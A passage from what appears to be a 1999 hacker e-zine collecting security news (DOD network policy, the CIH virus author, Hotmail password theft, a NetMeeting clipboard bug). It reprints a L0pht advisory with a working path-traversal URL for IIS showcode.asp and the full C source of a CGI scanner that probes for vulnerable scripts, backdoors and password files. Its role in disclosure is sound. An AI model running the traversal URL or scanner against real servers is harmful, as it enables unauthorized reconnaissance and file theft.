SIPRNET provides no direct connections to the Internet, some DOD officials worry that giving personnel access to too much information could pose a security risk. The new policy would create "communities of interest" within the network, in which users would have access only to information required by their work. "You don't want to give anybody access to all of your [organization's] information," said Richard Hale, an information assurance engineering executive with the Defense Information Systems Agency. "We are concerned that 500,000 of our closest friends are looking at our secrets," said Hale, referring to the approximate number of government personnel who have access to some sort of classified information. Speaking at the Software Technology Conference here, Hale said senior DOD officials are expected to brief Deputy Secretary of Defense John Hamre today on the possibility of including the new policy as part of DOD's overall public-key infrastructure security initiative. PKI solutions combine encryption, digital certificates and other technologies to authenticate a user's identity and to ensure that data and transactions are not tampered with during transmission over the Internet. DOD announced plans last month to use PKI solutions to secure both internal and external communications. But PKI "doesn't solve anything itself," said Hale. Rather, because many of today's commercial security products "are not that good," DOD needs to devise a common set of policies governing both access and standards, he said. In addition, Hale said the department needs to address the "hodgepodge" of Internet connections and protection policies that make up the DOD security architecture and process, which he described as "just a mess." As a solution, Hale recommended formulating a set of standard policies that spell out what type of information will be allowed to enter and leave DOD networks. Hale said the modern way of dealing with adversaries, whether cyber-based or otherwise, remains "essentially unchanged" since the construction of the Great Wall of China, when nations erected stone embankments to protect their citizens against invading forces. "I do not think this can continue if we're really going to be serious about fighting wars using [COTS systems]," he said. @HWA 25.0 U.S Army to teach "Information Survival" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ US Army to Teach "Information Survival" From HNN http://www.hackernews.com/ contributed by l3inad This fall the US Army will offer a graduate-level course on information systems survivability. The course will teach engineers to develop systems capable of surviving any kind of technical glitch or network attack. The 14-week course will be beemed via satellite to 16 different locations and will be offered through the University of Maryland as an online, distance-learning initiative sponsored by the Army Research Laboratory in Adelphi, Md. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0503/web-army-5-5-99.html MAY 5, 1999 . . . 10:48 EDT Army to offer 'information survival' training BY DANIEL VERTON (dan_verton@fcw.com) SALT LAKE CITY -- The Army this fall plans to offer an online graduate-level training course on information systems survivability, teaching engineers to develop systems capable of surviving any kind of technical glitch and network attack. The new 14-week Infosurv course will be offered through the University of Maryland as an online, distance-learning initiative sponsored by the Army Research Laboratory in Adelphi, Md. During the course, students with a basic engineering background will build on their education with instruction on reliability, security and performance risks that must be addressed early in the life cycle of an information system. According to Lt. Col. Paul Walczak, senior computer scientist at the Army Research Laboratory, the concept of Infosurv has been around for about 10 years, growing out of research conducted at the Army Research Laboratory. Survivability, Walczak said, can best be defined as a system's ability to withstand hardware faults, software flaws, network attacks by hackers and electromagnetic interference. When one of these types of failures brings a system or a portion of a system down, the rest of the information infrastructure must be capable of operating, he said. "This is a serious attempt by the Army Research Lab to institutionalize the concept," Walczak said. Until now, reliability, survivability and security have been features that systems developers have "bolted on" after the development process started, he said. The goal is to build these requirements into the system design before development work begins, he said. The Army plans to transmit live courses each Thursday from a lecture room on the College Park, Md., campus to as many as 16 satellite locations. "We plan to beam this course out to as many sites as are interested in it," said Walczak, who noted that the University of Tennessee, Pennsylvania State University and Harvard University also have expressed interest in taking part in future courses. Peter Neumann, principal scientist at the Computer Science Laboratory at SRI International and the principal investigator for Infosurv research, will be the primary instructor for the course. The course will act as the core course in a new four-course masters-level certificate program in survivable systems, and it also can be used as credit toward a regular degree program. @HWA 26.0 TAKEDOWN gets ready for TAKEOFF ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Takedown Propaganda has Begun From HNN http://www.hackernews.com/ contributed by Arik TAKEDOWN, a movie produced by Millennium Films and Dimension Films and which will be released by Miramax is already getting reviews published. The film is claiming to be based on the true story of Kevin Mitnick. This 'review' is nothing more than an explanation of the plot with no commentary on whether the movie is good or bad. There is a discussion board about this review though. Aint-It-Cool-News http://www.aint-it-cool-news.com/display.cgi?id=3554 Our Pitbull looks at TAKEDOWN Here's our first look at TAKEDOWN a film about... well, shucks.. Pitbull here goes into that for ya him own self, so why should I. If anyone here's any additional info on this project let me know, alrighty? Cool. Here's our vicious pup... Woof! It's The Pitbull, back online with a preview of the new jacked-in, cybercrime, hacker thriller TAKEDOWN, produced by Millenium Films and Dimension Films and which will be released by Miramax. TAKEDOWN, directed by Joe Chappelle (PHANTOMS) is based on the true story of the trackdown, and eventual arrest of superhacker Kevin Mitnick. Played by Skeet Ulrich, Mitnick is a master at breaking into computer networks and stealing files. He believes that the First Amendment should cover all information and that anyone with a modem is entitled to free access. In the course of his hacking, he steals files from expert computer security consultant Tsutomoto Shimomura (Russell Wong). Included in the files is a super worm/virus called "Contempt", which enables the user to breakdown the security programs and firewalls of any computer network. The story becomes a cross country race against time and a battle of wits between Mitnick, trying to crack Contempt's code, and Shimomura and the FBI's efforts to track Mitnick down and stop him before he can upload the program to the internet. Also in the cast is Angie Featherstone as Shimomura's computer savvy girlfriend, and Donal Logue as Mitnick's friend and ally Alex Lowe. This could be the film that finally does away with the dweeb image of hackers and shows the computer geek as a freedom fighting hero and protector of our liberties. Hey, a couple of these characters actually have flesh and blood girlfriends! Well, it's time to chase some cats and scare the postman, so until next time, Woof! @HWA 27.0 Free Email Vulnerable ~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Free EMail Vulnerable contributed by Code Kid A little late but the Internet Security Advisors Group has found in a recent security probe that free e-mail services such as Microsoft's Hotmail, YahooMail and Excite Mail failed to provide a basic security. President of ISAG, Ira Winkler, says that this lack of features makes it possible for "Hackers" to read your email. NEW SCIENTIST http://www.eurekalert.org/releases/ns-fes050499.html Free E-mail Services Are Vulnerable To Hackers Free Web-based e-mail services are vulnerable to hackers, according to an analysis by the Internet Security Advisors Group, a consultancy in Severna Park, Maryland. In its security probe, ISAG focused on the three biggest and most firmly established Web-based free e-mail services: Microsoft's Hotmail, YahooMail and Excite Mail. It found that all three failed to provide a basic security feature that helps keep hackers out. The major mistake made by all the service providers was to allow users an unlimited number of attempts to log on, rather than locking them out after a couple of attempts if they got the password wrong. This, says Ira Winkler, president of ISAG, makes it possible for hackers to guess a password by brute force-using what is known as an automated dictionary attack, which tries vast numbers of different passwords until the correct one is found. This, Winkler says, is a basic information security issue the service providers should have got right. In addition, ISAG found that many Web-based e-mail systems also fail to encrypt their passwords when they are sent over the Net, making them easy prey for hackers to intercept. Some hackers collect passwords, logging into e-mail accounts and sending bogus messages. Last week, Hotmail tightened its security in response to ISAG's findings. Its log-in protocol now incorporates a slight delay when the password is entered. For each wrong attempt the delay increases, making any automated attack take an unfeasibly long time. "There's no impact on members who log in successfully," says Laura Norman, a project manager at Hotmail, "but this should deter potential dictionary attacks." Yahoo has also made changes to its password security system and Excite is believed to be considering the matter. ### Author: Duncan Graham-Rowe New Scientist issue 8th May 1999 28.0 Are consumers worried about online security? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Most Consumers not Concerned with Online Security contributed by W3rDnA Are consumers really worried about loosing their credit card numbers online? They shouldn't be, considering that your only liable for $50 worth of fraudulent charges. What consumers should be worried about is invasions of privacy while shopping online. Fox News http://www.foxnews.com/js_index.sml?content=/scitech/050599/security.sml The Detroit News http://detnews.com/1999/technology/9905/05/05050158.htm The Builder Online http://builder.hw.net/news/1999/may/05/shop05.htx Fox News Online Shoppers Willing to Accept Security Risk 10.29 a.m. ET (1429 GMT) May 5, 1999 By Andrew Hay REUTERS NEW YORK � Sean Michael says he had his credit card number stolen online and used in a fraudulent shopping spree, but it hasn't stopped him from trawling the Web in search of bargains. "The prices are so good, it's worth the risk," Michael, 25, said Monday as he took a break outside the Manhattan skyscraper where he works as a financial adviser. Michael is among online shoppers willing to face certain security risks to obtain products ranging from dress shirts to airline tickets at steep discounts. The perennial issue of e-commerce security sprang up again recently with reports that a 13-year-old boy had placed $3.1 million in bids on merchandise advertised on the Internet auction site eBay, including $1.2 million for a medical office in Florida. All the bids were fictitious. Industry analysts said online shopping risks vary greatly, often based on the size of the retailer, but in general typing your credit card number while online is no more dangerous than giving it to a waiter or a telephone operator. Michael's credit card problems followed one of his first online buys seven to eight months ago. Someone used his card for a number of fraudulent purchases after he ordered some dress shirts and a suit from Paul Fredrick, an established direct seller of men's apparel, which has sold its wares online since 1990. Paul Fredrick spokesman Jeff Giesener said the Fleetwood, Pa., company has strong encryption, or scrambling, software installed on its computers and he was not aware of any reported cases of credit card fraud among its 30,000 online customers. "I don't know why he's linking it to us; if you go to a restaurant, and a receipt goes in the garbage, it can be used fraudulently," Giesener said. "I think it's riskier offline." Michael said he was not held liable for any of the fraudulent buys and continues to be a regular customer at http://www.paulfredrick.com. Recent online fraud and hacker attacks show both leading Internet companies and small startups can fall prey to security breaches. In a much-publicized case, bidders at eBay Inc. and another online auction house, Up4Sale, fell victim to fraud when goods they bought were not delivered. Gartner Group analyst Chuck Shih said statistics generated by Visa indicated credit card fraud was as likely to occur online as offline. But slip-ups are most likely to take place at smaller, newer Web retail establishments racing to the Web, Shih said. In their rush to get online and establish their brand, these outfits often sidestep security issues in a bid to be first to market, he said. Credit card fraud remains so relatively rare that many companies find it easier to reimburse customers than to go through costly investigations to determine whether the fraud originated from their site, Donna Hoffmann, an Internet specialist at Vanderbilt University in Nashville, Tenn., said in a telephone interview. "When someone gets hurt seriously enough, then people are going to take a step back and look at security," Hoffman said in a telephone interview. "Right now, the security is not that sophisticated." Often, security breaches are merely the result of savvy hackers capitalizing on human errors. Improperly installed and maintained security software can put any online retailer at risk of credit card fraud. Recent cases have shown that so-called "shopping cart" technology used by some Web retailers could expose credit card numbers and other data to the public if not installed properly, Shih said. Hoffmann said smaller operations often lack the financial and human resources to monitor their security software continually. One way to increase security is to make customers go through a longer series of mouse clicks. But retailers hate sacrificing speed and giving up customers who find ordering too slow or boring and may think twice about impulse buys. Ultimately, combating fraud lies in the hands of the cyber-consumer. Online shoppers can use encryption technology, which scrambles data sent over the Internet, to protect credit card numbers in online transactions or can call 1-800 numbers to give the credit card number to a person after seeing something online. Bob, the 35-year-old founder of a Seattle Internet company, who asked that his last name not be used, said he takes such security steps when he can but that it doesn't keep him from buying when they're not available. "It's a trade-off between how much you'll save versus security," said Bob, who has used the Web to get discounts of up to 50 percent on plane tickets. "I've had no problems so far." @HWA 29.0 Hotmail Passwords Stolen ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Hotmail Passwords Stolen contributed by Laup A java script password-stealing application is known to have snared at least 10 users passwords and is the first time such a hole has been known to have been used to actually steal passwords. This particular hole involved an emailed attachment with a Web page link. A script running on the attacker's Web page then negotiated a request to change the password with the Hotmail server, locking the user out of the account and giving the attacker access to it. C|Net Malicious hacker steals Hotmail passwords By Paul Festa Staff Writer, CNET News.com May 6, 1999, 12:55 p.m. PT URL: http://www.news.com/News/Item/0,4,36213,00.html Hotmail password-stealing exploits are no longer the sole province of bug-hunting, ethical hackers. Microsoft's MSN Hotmail said it has implemented a patch to thwart a JavaScript exploit that snared the passwords of about ten users. Although Hotmail has faced numerous similar exploits in the past, they were merely demonstrations crafted by security-minded programmers anxious to expose security holes before they were exploited for real. This one appears to be the first known instance in which users actually lost their Hotmail passwords. "We're not aware of any [previous] passwords successfully stolen in this type of exploit," said Hotmail product manager Laura Norman. The Trojan horse password-stealing scheme involved an emailed attachment with a Web page link. A script running on the attacker's Web page then negotiated a request to change the password with the Hotmail server, locking the user out of the account and giving the attacker access to it. Hotmail was not more specific on the mechanics of the script or how the hole was patched. Norman did say Hotmail would step up its education efforts to users regarding the safety of opening attachments. "We are increasing our messaging to users about only opening attachments from trusted sources," she said. Trojan horses consist of executable content that acts in a way other than the user expects it to. JavaScript is a scripting language developed by Netscape Communications for authoring Web site actions that do not require user interaction; pop-up windows, for instance, are commonly authored with JavaScript. JavaScript is unrelated to Java, Sun Microsystems' platform-independent computer programming language. JavaScript has been the tool of choice for numerous bug hunters and hackers because of its ability to carry out actions on the user's computer without his or her consent or knowledge. For this reason, many security-conscious Web surfers disable the technology when surfing the Web. The perpetrator's Web site was hosted by free home page provider Tripod, which is owned by Lycos. Norman said that Tripod was "very cooperative," but she declined to state whether the firms were taking action against the password thief. @HWA 30.0 Microsoft IIS 4.0 vulnerability found ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Microsoft IIS 4.0 Vulnerability Found contributed by Weld Pond L0pht Heavy Industries has found a problem with IIS 4.0 and the ASP sample file, showcode.asp. This sample file is designed to view the contents of the sample .asp files that come with the software. Unfortunatley due to weak security this file can allow any remote user to view any text file on the web server. This has the potential to put transaction logs, credit card numbers, and other customer information from e-commerace servers at risk L0pht Heavy Industries http://www.l0pht.com L0pht Security Advisory ------------- URL Origin: http://www.l0pht.com/advisories.html Release Date: May 7th, 1999 Application: Microsoft IIS 4.0 Web Server Severity: Web users can view ASP source code and other sensitive files on the web server Author: weld@l0pht.com Operating Sys: Microsoft NT Server 4.0 -------------- I. Description Internet Information Server (IIS) 4.0 ships with a set of sample files to help web developers learn about Active Server Pages (ASP). One of these sample files, showcode.asp, is designed to view the source code of the sample applications via a web browser. The showcode.asp file does inadequate security checking and allows anyone with a web browser to view the contents of any text file on the web server. This includes files that are outside of the document root of the web server. Many ecommerce web servers store transaction logs and other customer information such as credit card numbers, shipping addresses, and purchase information in text files on the web server. This is the type of data that could be accessed with this vulnerability. The L0pht would like to thank Parcens for doing the initial research on this problem. II. Details The showcode.asp file is installed by default at the URL: http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp It takes 1 argument in the URL, which is the file to view. The format of this argument is: source=/path/filename So to view the contents of the showcode.asp file itself the URL would be: http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp This looks like a fairly dangerous sample file. It can view the contents of files on the system. The author of the ASP file added a security check to only allow the viewing of the sample files which were in the '/msadc' directory on the system. The problem is the security check does not test for the '..' characters within the URL. The only checking done is if the URL contains the string '/msadc/'. This allows URLs to be created that view, not only files outside of the samples directory, but files anywhere on the entire file system that the web server's document root is on. For example, a URL that will view the contents of the boot.ini file, which is in the root directory of an NT system is: http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini This URL requires that IIS 4.0 was installed in its default location. III. Solution For production servers, sample files should never be installed so delete the entire /msadc/samples directory. If you must have the showcode.asp capability on development servers the showcode.asp file should be modified to test for URLs with '..' in them and deny those requests. For specific questions about this advisory, please contact weld@l0pht.com --------------- For more L0pht (that's L - zero - P - H - T) advisories check out: http://www.l0pht.com/advisories.html --------------- @HWA 31.0 [ISN] More on CIH , college student receives demerit but no other punishment ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: 7Pillars Partners <partners@sirius.infonex.com> Taiwan college identifies computer virus author TAIPEI, Taiwan (AP) - A former computer engineering student was identified by his college today as the author of the Chernobyl virus - the menace that caused hundreds of thousands of computer meltdowns around the world this week. The Tatung Institute of Technology had punished Chen Ing-hau last April when the virus he wrote as a student began to cause damage in an inter-college data system, according to Lee Chee-chen, the institute's dean of student affairs. Chen, who was a senior at the time, was given a demerit but not expelled. The Chernobyl virus is known in Taiwan as the CIH, using Chen's initials. The college did not mete out a more severe punishment because Chen had warned fellow students not to spread the virus, Lee said. Chen did not come up with an anti-virus program, Lee said. Lee said he was not sure how the virus ended up causing so much destruction a year later. Chen graduated from the college last summer and now is serving Taiwan's two-year compulsory military service, Lee said. Officials of the Bureau of Criminal Investigation said they would seek permission to question Chen. The unusually destructive virus - timed to strike on April 26, the 13th anniversary of the Chernobyl nuclear disaster - tries to erase a computer's hard drive and write gibberish into its system settings to prevent the machine from being restarted. Turkey and South Korea each reported 300,000 computers damaged Monday, and there were more elsewhere in Asia and the Middle East. Fewer than 10,000 of the 50 million computers in the United States were affected. Copyright 1999 Associated Press. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 32.0 [ISN] Taiwan virus suspect free on lack of victims ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/TECH/computing/9904/30/virus.computer.reut/index.html Taiwan virus suspect free on lack of victims April 30, 1999 Web posted at: 11:59 a.m. EDT (1559 GMT) TAIPEI, Taiwan (Reuters) -- Investigators said on Friday a Taiwan hacker admitted creating the Chernobyl virus that ravaged computers worldwide but said a lack of any local plaintiffs made it difficult to charge him. Police said Chen Ing-hau, a 24-year-old information engineer now serving mandatory military service, was questioned but not charged and the probe hinged on finding victims. "He's not a criminal here as long as no one registers a complaint," a Taipei police spokeswoman said. "All we know about problems with the virus is what we've seen in foreign news reports." Chen's rogue program hit hardest in countries with weak anti-virus defenses, gumming up hundreds of thousands of computers in South Korea, Turkey and China and thousands in India, Bangladesh, the Mideast and elsewhere. Police said no infections had been reported in Taiwan. Chen was questioned on suspicion of intentionally spreading a computer virus, a crime that carries a possible three-year prison term, and could be charged if victims come forth. A bashful Chen, in brief comments after he was released, expressed remorse and offered to help victims remove the virus from their computers. Authorities said Chen created the virus while studying at Tatung Institute of Technology, which had disciplined him a year ago after learning about the computer program, and did not pursue the matter further with authorities. Dubbed Chernobyl because it strikes on anniversaries of the April 26, 1986, Soviet nuclear disaster, the virus is known to experts as CIH -- which Chen acknowledged were his initials. Chernobyl and other CIH variants are among the most damaging viruses of recent years, less widespread than the e-mail replicator virus "Melissa" that swamped Internet servers around the world in April but far more vicious. Chernobyl/CIH employs a "spacefilling" technique that clogs up a computer's hard-disk storage system, crashing most systems and in many cases making restart impossible. Western virus experts first traced Chernobyl/CIH to Taiwan in June 1998 and said it had spread worldwide via the Internet and other networks within a week. Chernobyl's virulence and Taiwan's seemingly lenient handling of its author have kindled a debate about how the world should combat viruses. In the United States, where the Melissa virus's spewing of duplicate e-mail messages forced many firms to shut down their overtaxed computer networks, alleged author David Smith faces the possibility of 40 years in prison if convicted. ZDNet writer Robert Lemos, in an Internet dispatch, said Taiwan's Chen "was not prosecuted, but merely reprimanded and given a demerit" by his school. "The immense differences in punishment illustrate a large rift in perceptions over the seriousness of computer viruses," Lemos wrote, adding that while "Melissa was essentially benign, CIH was deadly to some computers." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 33.0 cgichk 1.34c modification adds port numbers by 'Joe Hacker' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* ---------------------------------------------------------------------- */ /* CGI scanner v1.33, m0dify and recode by su1d sh3ll //UnlG 1999 */ /* Tested on Slackware linux with kernel 2.0.35;2.0.36; */ /* FreeBSD 2.2.2-3.1;IRIX 5.3 */ /* Source c0de by [CKS & Fdisk] */ /* Gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/ /* el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX , */ /* hypoclear of lUSt */ /* Fuck to: www.hackzone.ru , HDT... CHC fuck u 2 llamaz-scr1pt k1dd1ez */ /* hey! v0rt-fu if u kewl programmer u must write u own proggi, */ /* and stop modify th1s scanner...(i can do it better and CKS ;) */ /* hmm, remember if u can add 2 CGi to scanner u can't change */ /* real Version number and name.....better go read 'C' Bible ;-) */ /* c0m1ng s00n: hmmm.... i forgot 8-) again forgot... :-) */ /* -----------------------------------------------[02:30 04.05.99 UnlG]- */ /* codex@bogus.net // added misc TCP port support 06.05.99 */ #include <fcntl.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <signal.h> #include <stdio.h> #include <string.h> #include <netdb.h> #include <ctype.h> #include <arpa/nameser.h> #include <sys/stat.h> #include <strings.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> int main(int argc, char *argv[]) { int sock,debugm=0; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long start; unsigned long end; unsigned long counter; char foundmsg[] = "200"; char *cgistr; char buffer[1024]; int count=0; int numin; char cgibuff[1024]; char *buff[100]; /* Don't u think 100 is enought? ;-)*/ char *cginame[100]; /* Don't u think 100 is enought? */ int myport = 80; buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n"; /* v0rt-fu when u modify source, check this first line.... that's my 8-) */ buff[2] = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n"; buff[3] = "GET /cgi-bin/phf HTTP/1.0\n\n"; buff[4] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n"; buff[5] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n"; buff[6] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n"; buff[7] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n"; buff[8] = "GET /cgi-bin/handler HTTP/1.0\n\n"; buff[9] = "GET /cgi-bin/webgais HTTP/1.0\n\n"; buff[10] = "GET /cgi-bin/websendmail HTTP/1.0\n\n"; buff[11] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n"; buff[12] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n"; buff[13] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n"; buff[14] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n"; buff[15] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n"; buff[16] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n"; buff[17] = "GET /cgi-bin/www-sql HTTP/1.0\n\n"; buff[18] = "GET /cgi-bin/view-source HTTP/1.0\n\n"; buff[19] = "GET /cgi-bin/campas HTTP/1.0\n\n"; buff[20] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n"; buff[21] = "GET /cgi-bin/glimpse HTTP/1.0\n\n"; buff[22] = "GET /cgi-bin/man.sh HTTP/1.0\n\n"; buff[23] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n"; buff[24] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n"; buff[25] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n"; buff[26] = "GET /cgi-bin/jj HTTP/1.0\n\n"; buff[27] = "GET /cgi-bin/info2www HTTP/1.0\n\n"; buff[28] = "GET /cgi-bin/files.pl HTTP/1.0\n\n"; buff[29] = "GET /cgi-bin/finger HTTP/1.0\n\n"; buff[30] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n"; buff[31] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n"; buff[32] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n"; buff[33] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n"; buff[34] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n"; buff[35] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n"; buff[36] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n"; buff[37] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n"; buff[38] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n"; buff[39] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n"; buff[40] = "GET /_vti_pvt/shtml.dll HTTP/1.0\n\n"; buff[41] = "GET /_vti_pvt/shtml.exe HTTP/1.0\n\n"; buff[42] = "GET /cgi-dos/args.bat HTTP/1.0\n\n"; buff[43] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n"; buff[44] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n"; buff[45] = "GET /scripts/CGImail.exe HTTP/1.0\n\n"; buff[46] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n"; buff[47] = "GET /scripts/fpcount.exe HTTP/1.0\n\n"; buff[48] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n"; buff[49] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n"; buff[50] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n"; buff[51] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n"; buff[52] = "GET /search97.vts HTTP/1.0\n\n"; buff[53] = "GET /carbo.dll HTTP/1.0\n\n"; /* we have at archive about 70 CGi , rule? ;-) */ cginame[1] = "UnlG - backd00r "; cginame[2] = "THC - backd00r "; cginame[3] = "phf..classic :) "; cginame[4] = "Count.cgi "; cginame[5] = "test-cgi "; cginame[6] = "nph-test-cgi "; cginame[7] = "php.cgi "; cginame[8] = "handler "; cginame[9] = "webgais "; cginame[10] = "websendmail "; cginame[11] = "webdist.cgi "; cginame[12] = "faxsurvey "; cginame[13] = "htmlscript "; cginame[14] = "pfdisplay "; cginame[15] = "perl.exe "; cginame[16] = "wwwboard.pl "; cginame[17] = "www-sql "; cginame[18] = "view-source "; cginame[19] = "campas "; cginame[20] = "aglimpse "; cginame[21] = "glimpse "; cginame[22] = "man.sh "; cginame[23] = "AT-admin.cgi "; cginame[24] = "filemail.pl "; cginame[25] = "maillist.pl "; cginame[26] = "jj "; cginame[27] = "info2www "; cginame[28] = "files.pl "; cginame[29] = "finger "; cginame[30] = "bnbform.cgi "; cginame[31] = "survey.cgi "; cginame[32] = "AnyForm2 "; cginame[33] = "textcounter.pl "; cginame[34] = "classifields.cgi"; cginame[35] = "environ.cgi "; cginame[36] = "service.pwd "; cginame[37] = "users.pwd "; cginame[38] = "authors.pwd "; cginame[39] = "administrators "; cginame[40] = "shtml.dll "; cginame[41] = "shtml.exe "; cginame[42] = "args.bat "; cginame[43] = "uploader.exe "; cginame[44] = "bdir - samples "; cginame[45] = "CGImail.exe "; cginame[46] = "newdsn.exe "; cginame[47] = "fpcount.exe "; cginame[48] = "openfile.cfm "; cginame[49] = "exprcalc.cfm "; cginame[50] = "dispopenedfile "; cginame[51] = "sendmail.cfm "; cginame[52] = "search97.vts "; cginame[53] = "carbo.dll "; if (argc<2) { printf("\n [-- CGI Checker 1.34. Modified by su1d sh3ll //UnlG --]"); printf("\nusage : %s host <port> ",argv[0]); printf("\n Or : %s host <port> -d for debug mode\n\n",argv[0]); exit(0); } /* --- seriously rubbish hack, but never mind (codex@bogus.net) */ if(argv[2]) { if(strstr("-d",argv[2])) { debugm=1; } if(atoi(argv[2])) { myport=atoi(argv[2]); } else { printf("Error: need a valid port\n"); exit(0); } } if(argv[3]) { if(strstr("-d",argv[3])) { debugm=1; } } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll 04.05.99\n\n\n"); start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(myport); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("\n\n\t [ Press any key to check out the httpd version...... ]\n"); getchar(); /* CKS sorry, but ur new piece of code don't work :-( */ send(sock, "HEAD / HTTP/1.0\n\n",17,0); recv(sock, buffer, sizeof(buffer),0); printf("%s",buffer); close(sock); printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n"); getchar(); while(count++ < 53) /* huh! 53 cgi..... no secur1ty in th1s w0rld ;-)*/ { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("Searching for %s : ",cginame[count]); for(numin=0;numin < 1024;numin++) { cgibuff[numin] = '\0'; } send(sock, buff[count],strlen(buff[count]),0); recv(sock, cgibuff, sizeof(cgibuff),0); cgistr = strstr(cgibuff,foundmsg); if( cgistr != NULL) printf("Found !! ;)\n"); else printf("Not Found\n"); if(debugm==1) { printf("\n\n ------------------------\n %s \n ------------------------\n",cgibuff); printf("Press any key to continue....\n"); getchar(); } close(sock); } printf("...have a nice hack... ;-)\n"); } @HWA 34.0 Microsoft Netmeeting Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 4 May 1999 13:12:09 -0300 From: Wanderley J. Abreu Junior <storm@UNIKEY.COM.BR> To: BUGTRAQ@netspace.org Subject: Microsoft Netmeeting Hole Since I hadn't any response from Microsoft and a formal response from CERT i'm putting it here hopping for a helping hand on this problem. Version 1.0 October 1996 CERT(sm) Coordination Center Product Vulnerability Reporting Form If you know of a vulnerability in a product, please complete this form and return it to cert@cert.org. We aren't able to acknowledge each report we receive; however, if we have additional questions, we will contact you for further information. We prefer that any vulnerability information you send to us be encrypted. We can support a shared DES key or PGP. Contact the CERT staff for more information. The CERT PGP public key is available in ftp://info.cert.org/pub/CERT_PGP.key Thanks, we appreciate your taking the time to report this vulnerability. Please describe the vulnerability. - --------------------------------- What is the impact of this vulnerability? - ---------------------------------------- (For example: local user can gain root/privileged access, intruders can create root-owned files, denial of service attack, etc.) a) What is the specific impact: Users running MS NetMeeting Version 2.1 (The one that comes with windows 98) software in a conference can copy/paste the remote clipboard area. b) How would you envision it being used in an attack scenario: With the chat windows OPENED just do a CTRL-C in the box where you write with nothing in your box and nothing selected at all. then, you can get the entire clipboard from the other user in the conference, of course, if there's something in his Clipboard (ASCII, Bin, etc). To your knowledge is the vulnerability currently being exploited? - ---------------------------------------------------------------- [no] If there is an exploitation script available, please include it here. - -------------------------------------------------------------------- Do you know what systems and/or configurations are vulnerable? - ------------------------------------------------------------- [yes] (If yes, please list them below) System : Windows 95, 98 and NT OS version : All Versions Verified/Guessed: Guessed Are you aware of any workarounds and/or fixes for this vulnerability? - -------------------------------------------------------------------- [yes] (If you have a workaround or are aware of 